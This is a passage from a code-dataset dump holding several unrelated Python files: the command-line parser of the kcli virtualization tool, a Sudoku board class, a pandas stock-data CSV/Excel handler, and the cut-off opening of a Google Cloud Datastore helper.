baseconfig.list_products(repo=repo)\n for prod in sorted(productsinfo, key=lambda x: (x['repo'], x['group'], x['name'])):\n name = prod['name']\n repo = prod['repo']\n prodgroup = prod['group']\n description = prod.get('description', 'N/A')\n if product.lower() not in name.lower() and product.lower() not in description.lower():\n continue\n if group is not None and prodgroup != group:\n continue\n numvms = prod.get('numvms', 'N/A')\n memory = prod.get('memory', 'N/A')\n group = prod.get('group', 'N/A')\n products.add_row([repo, group, name, description, numvms, memory])\n print(products)\n else:\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone,\n namespace=args.namespace)\n common.pprint(\"Creating product %s...\" % product)\n config.create_product(product, repo=repo, group=group, plan=plan, latest=latest, overrides=overrides)\n return 0\n\n\ndef ssh(args):\n \"\"\"Ssh into vm\"\"\"\n l = args.L\n r = args.R\n D = args.D\n X = args.X\n Y = args.Y\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n name = [common.get_lastvm(config.client)] if not args.name else args.name\n k = config.k\n tunnel = config.tunnel\n insecure = config.insecure\n if len(name) > 1:\n cmd = ' '.join(name[1:])\n else:\n cmd = None\n name = name[0]\n if '@' in name and len(name.split('@')) == 2:\n user = name.split('@')[0]\n name = name.split('@')[1]\n else:\n user = None\n if os.path.exists(\"/i_am_a_container\") and not os.path.exists(\"/root/.kcli/config.yml\")\\\n and not os.path.exists(\"/root/.ssh/config\"):\n insecure = True\n sshcommand = k.ssh(name, user=user, local=l, remote=r, tunnel=tunnel, insecure=insecure, cmd=cmd, X=X, Y=Y, D=D)\n if sshcommand is not None:\n if find_executable('ssh') is not None:\n os.system(sshcommand)\n else:\n print(sshcommand)\n else:\n common.pprint(\"Couldnt ssh to %s\" % name, color='red')\n\n\ndef scp(args):\n \"\"\"Scp into vm\"\"\"\n recursive = args.recursive\n volumepath = args.volumepath\n source = args.source[0]\n source = source if not os.path.exists(\"/i_am_a_container\") else \"%s/%s\" % (volumepath, source)\n destination = args.destination[0]\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n tunnel = config.tunnel\n if len(source.split(':')) == 2:\n name, source = source.split(':')\n download = True\n elif len(destination.split(':')) == 2:\n name, destination = destination.split(':')\n download = False\n else:\n common.pprint(\"Couldn't run scp\", color='red')\n return\n if '@' in name and len(name.split('@')) == 2:\n user, name = name.split('@')\n else:\n user = None\n scpcommand = k.scp(name, user=user, source=source, destination=destination,\n tunnel=tunnel, download=download, recursive=recursive)\n if scpcommand is not None:\n if find_executable('scp') is not None:\n os.system(scpcommand)\n else:\n print(scpcommand)\n else:\n common.pprint(\"Couldn't run scp\", color='red')\n\n\ndef network(args):\n \"\"\"Create/Delete/List Network\"\"\"\n name = args.name\n overrides = common.get_overrides(paramfile=args.paramfile, param=args.param)\n delete = args.delete\n isolated = args.isolated\n cidr = args.cidr\n nodhcp = args.nodhcp\n domain = args.domain\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if name is None:\n common.pprint(\"Missing Network\", color='red')\n os._exit(1)\n if delete:\n result = k.delete_network(name=name, cidr=cidr)\n common.handle_response(result, name, element='Network ', action='deleted')\n else:\n if isolated:\n nat = False\n else:\n nat = True\n dhcp = not nodhcp\n result = k.create_network(name=name, cidr=cidr, dhcp=dhcp, nat=nat, domain=domain, overrides=overrides)\n common.handle_response(result, name, element='Network ')\n\n\ndef bootstrap(args):\n \"\"\"Generate basic config file\"\"\"\n name = args.name\n host = args.host\n port = args.port\n user = args.user\n protocol = args.protocol\n url = args.url\n pool = args.pool\n poolpath = args.poolpath\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n baseconfig.bootstrap(name, host, port, user, protocol, url, pool, poolpath)\n\n\ndef container(args):\n \"\"\"Create container\"\"\"\n name = args.name\n profile = args.profile\n overrides = common.get_overrides(paramfile=args.paramfile, param=args.param)\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n cont = Kcontainerconfig(config, client=args.containerclient).cont\n if name is None:\n name = nameutils.get_random_name()\n if config.type == 'kubevirt':\n name = name.replace('_', '-')\n if profile is None:\n common.pprint(\"Missing profile\", color='red')\n os._exit(1)\n containerprofiles = {k: v for k, v in config.profiles.items() if 'type' in v and v['type'] == 'container'}\n if profile not in containerprofiles:\n common.pprint(\"profile %s not found. Trying to use the profile as image\"\n \"and default values...\" % profile, color='blue')\n cont.create_container(name, profile, overrides=overrides)\n else:\n common.pprint(\"Deploying container %s from profile %s...\" % (name, profile))\n profile = containerprofiles[profile]\n image = next((e for e in [profile.get('image'), profile.get('template')] if e is not None), None)\n if image is None:\n common.pprint(\"Missing image in profile %s. Leaving...\" % profile, color='red')\n os._exit(1)\n cmd = profile.get('cmd', None)\n ports = profile.get('ports', None)\n environment = profile.get('environment', None)\n volumes = next((e for e in [profile.get('volumes'), profile.get('disks')] if e is not None), None)\n cont.create_container(name, image, nets=None, cmd=cmd, ports=ports, volumes=volumes, environment=environment)\n common.pprint(\"container %s created\" % name)\n return\n\n\ndef snapshot(args):\n \"\"\"Create/Delete/Revert snapshot\"\"\"\n snapshot = args.snapshot\n name = args.name\n revert = args.revert\n delete = args.delete\n listing = args.listing\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n if revert:\n common.pprint(\"Reverting snapshot of %s named %s...\" % (name, snapshot))\n elif delete:\n common.pprint(\"Deleting snapshot of %s named %s...\" % (name, snapshot))\n elif listing:\n common.pprint(\"Listing snapshots of %s...\" % name)\n snapshots = k.snapshot(snapshot, name, listing=True)\n if isinstance(snapshots, dict):\n common.pprint(\"Vm %s not found\" % name, color='red')\n return\n else:\n for snapshot in snapshots:\n print(snapshot)\n return\n elif snapshot is None:\n common.pprint(\"Missing snapshot name\", color='red')\n return {'result': 'success'}\n else:\n common.pprint(\"Creating snapshot of %s named %s...\" % (name, snapshot))\n result = k.snapshot(snapshot, name, revert=revert, delete=delete)\n code = common.handle_response(result, name, element='', action='snapshotted')\n return code\n\n\ndef report(args):\n \"\"\"Report info about host\"\"\"\n config = Kconfig(client=args.client, debug=args.debug, region=args.region, zone=args.zone, namespace=args.namespace)\n k = config.k\n k.report()\n\n\ndef switch(args):\n \"\"\"Handle host\"\"\"\n host = args.host\n baseconfig = Kbaseconfig(client=args.client, debug=args.debug)\n result = baseconfig.switch_host(host)\n if result['result'] == 'success':\n os._exit(0)\n else:\n os._exit(1)\n\n\ndef cli():\n \"\"\"\n\n \"\"\"\n parser = argparse.ArgumentParser(description='Libvirt/VirtualBox/Kubevirt'\n 'wrapper on steroids. Check out '\n 'https://github.com/karmab/kcli!')\n parser.add_argument('-C', '--client')\n parser.add_argument('--containerclient', help='Containerclient to use')\n parser.add_argument('--dnsclient', help='Dnsclient to use')\n parser.add_argument('-d', '--debug', action='store_true')\n parser.add_argument('-n', '--namespace', help='Namespace to use. specific to kubevirt')\n parser.add_argument('-r', '--region', help='Region to use. specific to aws/gcp')\n parser.add_argument('-z', '--zone', help='Zone to use. specific to gcp')\n parser.add_argument('-v', '--version', action='version', version=__version__)\n\n subparsers = parser.add_subparsers(metavar='')\n\n bootstrap_info = 'Generate basic config file'\n bootstrap_parser = subparsers.add_parser('bootstrap', help=bootstrap_info, description=bootstrap_info)\n bootstrap_parser.add_argument('-n', '--name', help='Name to use', metavar='CLIENT')\n bootstrap_parser.add_argument('-H', '--host', help='Host to use', metavar='HOST')\n bootstrap_parser.add_argument('-p', '--port', help='Port to use', metavar='PORT')\n bootstrap_parser.add_argument('-u', '--user', help='User to use', default='root', metavar='USER')\n bootstrap_parser.add_argument('-P', '--protocol', help='Protocol to use', default='ssh', metavar='PROTOCOL')\n bootstrap_parser.add_argument('-U', '--url', help='URL to use', metavar='URL')\n bootstrap_parser.add_argument('--pool', help='Pool to use', metavar='POOL')\n bootstrap_parser.add_argument('--poolpath', help='Pool Path to use', metavar='POOLPATH')\n bootstrap_parser.set_defaults(func=bootstrap)\n\n clone_info = 'Clone existing vm'\n clone_parser = subparsers.add_parser('clone', description=clone_info, help=clone_info)\n clone_parser.add_argument('-b', '--base', help='Base VM', metavar='BASE')\n clone_parser.add_argument('-f', '--full', action='store_true', help='Full Clone')\n clone_parser.add_argument('-s', '--start', action='store_true', help='Start cloned VM')\n clone_parser.add_argument('name', metavar='VMNAME')\n clone_parser.set_defaults(func=clone)\n\n console_info = 'Vnc/Spice/Serial/Container console'\n console_parser = subparsers.add_parser('console', description=console_info, help=console_info)\n console_parser.add_argument('-s', '--serial', action='store_true')\n console_parser.add_argument('--container', action='store_true')\n console_parser.add_argument('name', metavar='VMNAME', nargs='?')\n console_parser.set_defaults(func=console)\n\n container_info = 'Create container'\n container_parser = subparsers.add_parser('container', description=container_info, help=container_info)\n container_parser.add_argument('-p', '--profile', help='Profile to use', metavar='PROFILE')\n container_parser.add_argument('-P', '--param', action='append',\n help='specify parameter or keyword for rendering (can specify multiple)',\n metavar='PARAM')\n container_parser.add_argument('--paramfile', help='Parameters file', metavar='PARAMFILE')\n container_parser.add_argument('name', metavar='NAME', nargs='?')\n container_parser.set_defaults(func=container)\n\n delete_info = 'Delete vm/container'\n delete_parser = subparsers.add_parser('delete', description=delete_info, help=delete_info)\n delete_parser.add_argument('-y', '--yes', action='store_true', help='Dont ask for confirmation')\n delete_parser.add_argument('--container', action='store_true')\n delete_parser.add_argument('-t', '--template', action='store_true', help='delete template')\n delete_parser.add_argument('--snapshots', action='store_true', help='Remove snapshots if needed')\n delete_parser.add_argument('names', metavar='VMNAMES', nargs='*')\n delete_parser.set_defaults(func=delete)\n\n disk_info = 'Add/Delete disk of vm'\n disk_parser = subparsers.add_parser('disk', description=disk_info, help=disk_info)\n disk_parser.add_argument('-d', '--delete', action='store_true')\n disk_parser.add_argument('-s', '--size', type=int, help='Size of the disk to add, in GB', metavar='SIZE')\n disk_parser.add_argument('-n', '--diskname', help='Name or Path of the disk, when deleting', metavar='DISKNAME')\n disk_parser.add_argument('-t', '--template', help='Name or Path of a Template, when adding', metavar='TEMPLATE')\n disk_parser.add_argument('-p', '--pool', default='default', help='Pool', metavar='POOL')\n disk_parser.add_argument('name', metavar='VMNAME', nargs='?')\n disk_parser.set_defaults(func=disk)\n\n dns_info = 'Create/Delete dns entries'\n dns_parser = subparsers.add_parser('dns', description=dns_info, help=dns_info)\n dns_parser.add_argument('-d', '--delete', action='store_true')\n dns_parser.add_argument('-n', '--net', help='Domain where to create entry', metavar='NET')\n dns_parser.add_argument('-i', '--ip', help='Ip', metavar='IP')\n dns_parser.add_argument('name', metavar='NAME', nargs='?')\n dns_parser.set_defaults(func=dns)\n\n download_info = 'Download template'\n download_help = \"Template to download. Choose between \\n%s\" % '\\n'.join(TEMPLATES.keys())\n download_parser = subparsers.add_parser('download', description=download_info, help=download_info)\n download_parser.add_argument('-c', '--cmd', help='Extra command to launch after downloading', metavar='CMD')\n download_parser.add_argument('-p', '--pool', help='Pool to use. Defaults to default', metavar='POOL')\n download_parser.add_argument('-u', '--url', help='Url to use', metavar='URL')\n download_parser.add_argument('templates', choices=sorted(TEMPLATES.keys()),\n default='', help=download_help, nargs='*', metavar='')\n download_parser.set_defaults(func=download)\n\n host_info = 'List and Handle host'\n host_parser = subparsers.add_parser('host', description=host_info, help=host_info)\n host_parser.add_argument('-d', '--disable', help='Disable indicated client', metavar='CLIENT')\n host_parser.add_argument('-e', '--enable', help='Enable indicated client', metavar='CLIENT')\n host_parser.add_argument('-s', '--sync', action='store_true',\n help='sync templates between first host and other'\n 'ones of the specified list')\n host_parser.set_defaults(func=host)\n\n info_info = 'Info vms'\n info_parser = subparsers.add_parser('info', description=info_info, help=info_info)\n info_parser.add_argument('-f', '--fields',\n help='Display Corresponding list of fields,'\n 'separated by a comma', metavar='FIELDS')\n info_parser.add_argument('-o', '--output', choices=['plain', 'yaml'], help='Format of the output')\n info_parser.add_argument('-v', '--values', action='store_true', help='Only report values')\n info_parser.add_argument('names', help='VMNAMES', nargs='*')\n info_parser.set_defaults(func=info)\n\n export_info = 'Export vm'\n export_parser = subparsers.add_parser('export', description=export_info, help=export_info)\n export_parser.add_argument('-t', '--template', help='Name for the generated template. Uses the vm name otherwise',\n metavar='TEMPLATE')\n export_parser.add_argument('names', metavar='VMNAMES', nargs='*')\n export_parser.set_defaults(func=export)\n\n lb_info = 'Create/Delete loadbalancer'\n lb_parser = subparsers.add_parser('lb', description=lb_info, help=lb_info)\n lb_parser.add_argument('--checkpath', default='/index.html', help=\"Path to check. Defaults to /index.html\")\n lb_parser.add_argument('--checkport', default=80, help=\"Port to check. Defaults to 80\")\n lb_parser.add_argument('-d', '--delete', action='store_true')\n lb_parser.add_argument('--domain', help='Domain to create a dns entry associated to the load balancer')\n lb_parser.add_argument('-i', '--internal', action='store_true')\n lb_parser.add_argument('-p', '--ports', default='443', help='Load Balancer Ports. Defaults to 443')\n lb_parser.add_argument('-v', '--vms', help='Vms to add to the pool')\n lb_parser.add_argument('-y', '--yes', action='store_true', help='Dont ask for confirmation')\n lb_parser.add_argument('name', metavar='NAME', nargs='?')\n lb_parser.set_defaults(func=lb)\n\n list_info = 'List hosts, profiles, flavors, templates, isos,...'\n list_parser = subparsers.add_parser('list', description=list_info, help=list_info)\n list_parser.add_argument('-c', '--clients', action='store_true')\n list_parser.add_argument('-p', '--profiles', action='store_true')\n list_parser.add_argument('-f', '--flavors', action='store_true')\n list_parser.add_argument('-t', '--templates', action='store_true')\n list_parser.add_argument('-i', '--isos', action='store_true')\n list_parser.add_argument('-l', '--loadbalancers', action='store_true')\n list_parser.add_argument('-d', '--disks', action='store_true')\n list_parser.add_argument('-P', '--pools', action='store_true')\n list_parser.add_argument('-n', '--networks', action='store_true')\n list_parser.add_argument('-s', '--subnets', action='store_true')\n list_parser.add_argument('--containers', action='store_true')\n list_parser.add_argument('--images', action='store_true')\n list_parser.add_argument('--short', action='store_true')\n list_parser.add_argument('--plans', action='store_true')\n list_parser.add_argument('--repos', action='store_true')\n list_parser.add_argument('--products', action='store_true')\n list_parser.add_argument('-g', '--group', help='Only Display products of the indicated group', metavar='GROUP')\n list_parser.add_argument('-r', '--repo', help='Only Display products of the indicated repository', metavar='REPO')\n list_parser.add_argument('--filters', choices=('up', 'down'))\n list_parser.set_defaults(func=_list)\n\n network_info = 'Create/Delete Network'\n network_parser = subparsers.add_parser('network', description=network_info, help=network_info)\n network_parser.add_argument('-d', '--delete', action='store_true')\n network_parser.add_argument('-i', '--isolated', action='store_true', help='Isolated Network')\n network_parser.add_argument('-c', '--cidr', help='Cidr of the net', metavar='CIDR')\n network_parser.add_argument('--nodhcp', action='store_true', help='Disable dhcp on the net')\n network_parser.add_argument('--domain', help='DNS domain. Defaults to network name')\n network_parser.add_argument('-P', '--param', action='append',\n help='specify parameter or keyword for rendering (can specify multiple)',\n metavar='PARAM')\n network_parser.add_argument('--paramfile', help='Parameters file', metavar='PARAMFILE')\n network_parser.add_argument('name', metavar='NETWORK')\n network_parser.set_defaults(func=network)\n\n nic_info = 'Add/Delete nic of vm'\n nic_parser = subparsers.add_parser('nic', description=nic_info, help=nic_info)\n nic_parser.add_argument('-d', '--delete', action='store_true')\n nic_parser.add_argument('-i', '--interface', help='Name of the interface, when deleting', metavar='INTERFACE')\n nic_parser.add_argument('-n', '--network', help='Network', metavar='NETWORK')\n nic_parser.add_argument('name', metavar='VMNAME')\n nic_parser.set_defaults(func=nic)\n\n plan_info = 'Create/Delete/Stop/Start vms from plan file'\n plan_parser = subparsers.add_parser('plan', description=plan_info, help=plan_info)\n plan_parser.add_argument('-A', '--ansible', help='Generate ansible inventory', action='store_true')\n plan_parser.add_argument('-d', '--delete', action='store_true')\n plan_parser.add_argument('-u', '--url', help='Url for plan', metavar='URL')\n plan_parser.add_argument('-i', '--info', action='store_true', help='Provide information on the given plan')\n plan_parser.add_argument('-p', '--path', help='Path where to download plans. Defaults to plan', metavar='PATH')\n plan_parser.add_argument('-a', '--autostart', action='store_true', help='Set all vms from plan to autostart')\n plan_parser.add_argument('-c', '--container', action='store_true', help='Handle container')\n plan_parser.add_argument('-n', '--noautostart', action='store_true', help='Prevent all vms from plan to autostart')\n plan_parser.add_argument('-f', '--inputfile', help='Input Plan file')\n plan_parser.add_argument('--snapshot', action='store_true', help='snapshot all vms from plan')\n plan_parser.add_argument('-r', '--revert', action='store_true', help='revert snapshot of all vms from plan')\n plan_parser.add_argument('--restart', action='store_true', help='restart all vms from plan')\n plan_parser.add_argument('-s', '--start', action='store_true', help='start all vms from plan')\n plan_parser.add_argument('--update', action='store_true', help='update existing vms of the plan')\n plan_parser.add_argument('-w', '--stop', action='store_true', help='stop all vms from plan')\n plan_parser.add_argument('-v', '--volumepath', help='Volume Path (only used with kcli container)',\n default='/workdir', metavar='VOLUMEPATH')\n plan_parser.add_argument('-y', '--yes', action='store_true', help='Dont ask for confirmation')\n plan_parser.add_argument('--delay', default=0, help=\"Delay between each vm's creation\", metavar='DELAY')\n plan_parser.add_argument('-P', '--param', action='append',\n help='Define parameter for rendering (can specify multiple)', metavar='PARAM')\n plan_parser.add_argument('--paramfile', help='Parameters file', metavar='PARAMFILE')\n plan_parser.add_argument('plan', metavar='PLAN', nargs='?')\n plan_parser.set_defaults(func=plan)\n\n pool_info = 'Create/Delete pool'\n pool_parser = subparsers.add_parser('pool', description=pool_info, help=pool_info)\n pool_parser.add_argument('-d', '--delete', action='store_true')\n pool_parser.add_argument('-f', '--full', action='store_true')\n pool_parser.add_argument('-t', '--pooltype', help='Type of the pool', choices=('dir', 'lvm', 'zfs'),\n default='dir')\n pool_parser.add_argument('-p', '--path', help='Path of the pool', metavar='PATH')\n pool_parser.add_argument('--thinpool', help='Existing thin pool to use with lvm', metavar='THINPOOL')\n pool_parser.add_argument('pool')\n pool_parser.set_defaults(func=pool)\n\n product_info = 'Deploy Product'\n product_parser = subparsers.add_parser('product', description=product_info, help=product_info)\n product_parser.add_argument('-g', '--group', help='Group to use as a name during deployment', metavar='GROUP')\n product_parser.add_argument('-i', '--info', action='store_true', help='Provide information on the given product')\n product_parser.add_argument('-l', '--latest', action='store_true', help='Grab latest version of the plans')\n product_parser.add_argument('-P', '--param', action='append',\n help='Define parameter for rendering within '\n 'scripts. Can be repeated several times',\n metavar='PARAM')\n product_parser.add_argument('--paramfile', help='Parameters file', metavar='PARAMFILE')\n product_parser.add_argument('-r', '--repo', help='Repo to use, '\n 'if deploying a product present in several '\n 'repos', metavar='REPO')\n product_parser.add_argument('-s', '--search', action='store_true',\n help='Display matching products')\n product_parser.add_argument('product', metavar='PRODUCT')\n product_parser.set_defaults(func=product)\n\n repo_info = 'Create/Delete repos'\n repo_parser = subparsers.add_parser('repo', description=repo_info, help=repo_info)\n repo_parser.add_argument('-d', '--delete', action='store_true')\n repo_parser.add_argument('-u', '--url', help='URL of the repo', metavar='URL')\n repo_parser.add_argument('-U', '--update', action='store_true', help='Update repo')\n repo_parser.add_argument('repo')\n repo_parser.set_defaults(func=repo)\n\n report_info = 'Report Info about Host'\n report_parser = subparsers.add_parser('report', description=report_info, help=report_info)\n report_parser.set_defaults(func=report)\n\n scp_info = 'Scp into vm'\n scp_parser = subparsers.add_parser('scp', description=scp_info, help=scp_info)\n scp_parser.add_argument('-r', '--recursive', help='Recursive', action='store_true')\n scp_parser.add_argument('-v', '--volumepath', help='Volume Path (only used with kcli container)',\n default='/workdir', metavar='VOLUMEPATH')\n scp_parser.add_argument('source', nargs=1)\n scp_parser.add_argument('destination', nargs=1)\n scp_parser.set_defaults(func=scp)\n\n snapshot_info = 'Create/Delete/Revert snapshot'\n snapshot_parser = subparsers.add_parser('snapshot', description=snapshot_info, help=snapshot_info)\n snapshot_parser.add_argument('-n', '--name', help='Use vm name for creation'\n '/revert/delete', required=True,\n metavar='VMNAME')\n snapshot_parser.add_argument('-r', '--revert', help='Revert to indicated snapshot', action='store_true')\n snapshot_parser.add_argument('-d', '--delete', help='Delete indicated snapshot', action='store_true')\n snapshot_parser.add_argument('-l', '--listing', help='List snapshots', action='store_true')\n snapshot_parser.add_argument('snapshot', nargs='?')\n snapshot_parser.set_defaults(func=snapshot)\n\n ssh_info = 'Ssh into vm'\n ssh_parser = subparsers.add_parser('ssh', description=ssh_info, help=ssh_info)\n ssh_parser.add_argument('-D', help='Dynamic Forwarding', metavar='LOCAL')\n ssh_parser.add_argument('-L', help='Local Forwarding', metavar='LOCAL')\n ssh_parser.add_argument('-R', help='Remote Forwarding', metavar='REMOTE')\n ssh_parser.add_argument('-X', action='store_true', help='Enable X11 Forwarding')\n ssh_parser.add_argument('-Y', action='store_true', help='Enable X11 Forwarding(Insecure)')\n ssh_parser.add_argument('name', metavar='VMNAME', nargs='*')\n ssh_parser.set_defaults(func=ssh)\n\n start_info = 'Start vms/containers'\n start_parser = subparsers.add_parser('start', description=start_info, help=start_info)\n start_parser.add_argument('-c', '--container', action='store_true')\n start_parser.add_argument('names', metavar='VMNAMES', nargs='*')\n start_parser.set_defaults(func=start)\n\n stop_info = 'Stop vms/containers'\n stop_parser = subparsers.add_parser('stop', description=stop_info, help=stop_info)\n stop_parser.add_argument('-c', '--container', action='store_true')\n stop_parser.add_argument('names', metavar='VMNAMES', nargs='*')\n stop_parser.set_defaults(func=stop)\n\n restart_info = 'Restart vms/containers'\n restart_parser = subparsers.add_parser('restart', description=restart_info, help=stop_info)\n restart_parser.add_argument('-c', '--container', action='store_true')\n restart_parser.add_argument('names', metavar='VMNAMES', nargs='*')\n restart_parser.set_defaults(func=restart)\n\n switch_info = 'Switch host'\n switch_parser = subparsers.add_parser('switch', description=switch_info, help=switch_info)\n switch_parser.add_argument('host', help='HOST')\n switch_parser.set_defaults(func=switch)\n\n update_info = 'Update ip, memory or numcpus'\n update_parser = subparsers.add_parser('update', description=update_info, help=update_info)\n update_parser.add_argument('-1', '--ip1', help='Ip to set', metavar='IP1')\n update_parser.add_argument('-i', '--information', '--info', help='Information to set', metavar='INFORMATION')\n update_parser.add_argument('--network', '--net', help='Network to update', metavar='NETWORK')\n update_parser.add_argument('-f', '--flavor', help='Flavor to set', metavar='Flavor')\n update_parser.add_argument('-m', '--memory', help='Memory to set', metavar='MEMORY')\n update_parser.add_argument('-c', '--numcpus', type=int, help='Number of cpus to set', metavar='NUMCPUS')\n update_parser.add_argument('-p', '--plan', help='Plan Name to set', metavar='PLAN')\n update_parser.add_argument('-a', '--autostart', action='store_true', help='Set VM to autostart')\n update_parser.add_argument('-n', '--noautostart', action='store_true', help='Prevent VM from autostart')\n update_parser.add_argument('--dns', action='store_true', help='Update Dns entry for the vm')\n update_parser.add_argument('--host', action='store_true', help='Update Host entry for the vm')\n update_parser.add_argument('-d', '--domain', help='Domain', metavar='DOMAIN')\n update_parser.add_argument('-t', '--template', help='Template to set', metavar='TEMPLATE')\n update_parser.add_argument('--iso', help='Iso to set', metavar='ISO')\n update_parser.add_argument('--cloudinit', action='store_true', help='Remove Cloudinit Information from vm')\n update_parser.add_argument('names', help='VMNAMES', nargs='*')\n update_parser.set_defaults(func=update)\n\n vm_info = 'Create vm'\n vm_parser = subparsers.add_parser('vm', description=vm_info, help=vm_info)\n vm_parser.add_argument('-p', '--profile', help='Profile to use', metavar='PROFILE')\n vm_parser.add_argument('--profilefile', help='File to load profiles from', metavar='PROFILEFILE')\n vm_parser.add_argument('-P', '--param', action='append',\n help='specify parameter or keyword for rendering (can specify multiple)', metavar='PARAM')\n vm_parser.add_argument('--paramfile', help='Parameters file', metavar='PARAMFILE')\n vm_parser.add_argument('name', metavar='VMNAME', nargs='?')\n vm_parser.set_defaults(func=vm)\n if len(sys.argv) == 1 or (len(sys.argv) == 3 and sys.argv[1] == '-C'):\n parser.print_help()\n os._exit(0)\n args = parser.parse_args()\n if args.func.__name__ == 'vm' and args.client is not None and ',' in args.client:\n args.client = random.choice(args.client.split(','))\n common.pprint(\"Selecting %s for creation\" % args.client)\n args.func(args)\n\n\nif __name__ == '__main__':\n cli()\n","sub_path":"kvirt/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":63769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"227884879","text":"class Sudoku(object):\n \"\"\"\n A class for basic Sudoku functionality.\n - 'puzzle' should either be a filename for the puzzle to load from the 'puzzles/' folder\n or a list of lists sudoku board with entries as ints and empty tiles represented by 0\n e.g., problem = Sudoku('puz-001.txt')\n or\n board = [[7, 8, 1, 6, 0, 2, 9, 0, 5],\n [9, 0, 2, 7, 1, 0, 0, 0, 0],\n [0, 0, 6, 8, 0, 0, 0, 1, 2],\n [2, 0, 0, 3, 0, 0, 8, 5, 1],\n [0, 7, 3, 5, 0, 0, 0, 0, 4],\n [0, 0, 8, 0, 0, 9, 3, 6, 0],\n [1, 9, 0, 0, 0, 7, 0, 8, 0],\n [8, 6, 7, 0, 0, 3, 4, 0, 9],\n [0, 0, 5, 0, 0, 0, 1, 0, 0]]\n e.g., problem = Sudoku(board)\n \"\"\"\n\n EMPTY = 0\n\n def __init__(self, puzzle):\n \"\"\"\n Constructs the Sudoku class with the given puzzle. See description of Sudoku\n class for which arguments to pass to Sudoku(puzzle).\n self.board is a list of lists representation of the board using ints - you\n can update this board with your new moves\n self.orig_board is a list of lists representation of the original board\n \"\"\"\n if isinstance(puzzle,str):\n self.board = self.load_board(puzzle)\n else:\n self.board = puzzle\n self.orig_board = self.board\n\n def load_board(self, puzzle_file):\n \"\"\"\n Loads a puzzle txt file and converts it to a list of lists integer\n representation with empty tiles as 0.\n \"\"\"\n with open('puzzles/'+puzzle_file, 'r') as f:\n board = []\n for line in f:\n row = [int(s) for s in line.replace('-',str(Sudoku.EMPTY)).split(' ')]\n board += [row]\n return board\n\n def write(self, filename):\n \"\"\"\n Writes the board to file \"filename\".\n \"\"\"\n with open('solved_mrv/'+filename, 'w') as f:\n f.write(self.board_str())\n\n def board_str(self):\n \"\"\"\n Returns a string representation of the board for pretty printing to screen.\n \"\"\"\n out = ''\n for line in self.board:\n str_line = [str(i) if i!=Sudoku.EMPTY else '-' for i in line]\n out += ' '.join(str_line)+'\\n'\n return out[:-1]\n\n def complete(self):\n \"\"\"\n Tests whether all the tiles in the board are filled in.\n Returns true if the board is filled. False, otherwise.\n \"\"\"\n return all([all(row) for row in self.board])\n\n def overwritten(self):\n \"\"\"\n Tests whether one of the original tiles was overwritten. You should NOT\n be overwriting any of the original tiles, so hopefully this returns False.\n Returns True if the board was overwritten. False, otherwise.\n \"\"\"\n for row, line in enumerate(self.orig_board):\n for col, num in enumerate(line):\n if num != Sudoku.EMPTY:\n if num != self.board[row][col]:\n return True\n return False\n\n\nif __name__ == '__main__':\n problem = Sudoku('puz-001.txt')\n problem.write('puz-001-solved.txt')\n print(problem.board_str())\n print(problem.complete())\n print(problem.overwritten())\n problem2 = Sudoku(problem.board)\n print(help(Sudoku))\n","sub_path":"HW2Assignment/code/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"458651961","text":"'''\nCreated on May 3, 2019\n\n@author: mac\n'''\nimport pandas as pd\nfrom StockDataItem.StockItemBase import CStockItemBase\nimport os\n\nclass CStockItemIO_CSV(object):\n\n def __init__(self):\n self.stocks = None\n\n def __splictToItems(self, df):\n '''\n 格式统一化,\n '''\n datas = df.to_dict('index')\n keys = datas.keys()\n stocks = []\n for key in keys:\n data = datas[key]\n stock = CStockItemBase()\n stock.initWithDict(data)\n stocks.append(stock)\n self.stocks = stocks\n return stocks\n\n def __formatResultToDataFrame(self, stocks):\n stockList = [t.formatToDict() for t in stocks]\n columns = stocks[0].getColunmInfo()\n d = pd.DataFrame(stockList,columns=columns)\n return d\n\n def __saveToCSV(self,fileName, stocks):\n df = self.__formatResultToDataFrame(stocks)\n df.to_csv(fileName,encoding=\"utf_8_sig\", index=False)\n\n def __saveToExcel(self, fileName, stocks):\n df = self.__formatResultToDataFrame(stocks)\n df.to_excel(fileName,encoding=\"utf_8_sig\", index=False)\n \n def ReadFromCSV(self,fileName):\n df = pd.read_csv(fileName, index_col = None, encoding='utf_8_sig')\n self.__splictToItems(df)\n \n \n def SaveTo(self, fileName):\n return self.SaveToWithStocks(fileName, self.stocks)\n\n def SaveToWithStocks(self,fileName, stocks):\n ext = fileName[fileName.rfind('.')+1:]\n path = fileName[:fileName.rfind('/')+1]\n if not os.path.exists(path):\n os.makedirs(path)\n if ext == 'csv':\n self.__saveToCSV(fileName, stocks) \n elif ext == 'xlsx' or ext == 'xls':\n self.__saveToExcel(fileName, stocks)\n \n \nif __name__ == '__main__':\n fileName = u'/Volumes/Data/Downloads/2019-05-02_x.csv'\n destFileName = u'/Volumes/Data/Downloads/2019-05-02_x.xlsx'\n stockCSV = CStockItemIO_CSV()\n stockCSV.ReadFromCSV(fileName)","sub_path":"src/StockDataItemIO/StockItemIO_CSV.py","file_name":"StockItemIO_CSV.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"273876098","text":"from __future__ import annotations\n\nimport os\nimport itertools\nfrom collections import defaultdict\nfrom dataclasses import dataclass, field\nfrom datetime import datetime\nfrom enum import Enum\nfrom typing import Type, Generator, get_args, Dict, ClassVar, Any, Tuple, get_type_hints, Union, Callable, List\n\nfrom google.cloud import datastore\n\nfrom gcp_pilot import exceptions\n\nDEFAULT_NAMESPACE = os.environ.get(\"GCP_DATASTORE_NAMESPACE\", default=None)\nDEFAULT_PK_FIELD = 